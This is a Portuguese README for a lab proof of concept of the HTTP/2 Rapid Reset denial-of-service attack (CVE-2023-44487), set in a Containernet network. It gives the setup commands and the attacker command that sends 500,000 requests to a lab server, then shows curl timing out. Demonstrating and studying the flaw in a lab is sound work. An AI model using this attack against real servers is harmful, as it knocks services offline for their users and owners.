
PoC para a Vulnerabilidade DDoS de Rapid Reset HTTP/2 - CVE-2023-44487
Este projeto demonstra o ataque de Negação de Serviço (DoS) de Reset Rápido HTTP/2 usando uma topologia de rede personalizada criada com Containernet. O ataque explora vulnerabilidades no protocolo HTTP/2 para sobrecarregar um servidor alvo, tornando-o irresponsivo.

Para instalar os pacotes necessários, execute os seguintes comandos:
./install.sh
Para alterar o diretório de instalação padrão, você pode modificar a variável INSTALL_DIR da seguinte forma:
INSTALL_DIR=/custom/path ./install.sh
Para iniciar a infraestrutura, execute os seguintes comandos:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
Para iniciar o ataque, execute o seguinte comando no contêiner do atacante:
./attacker -url='https://modern.art:443/api' -requests=500000
Após alguns instantes, ao tentar acessar o site usando curl, ele se torna irresponsivo.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
Para parar a infraestrutura, basta digitar exit no terminal onde topo.py está sendo executado.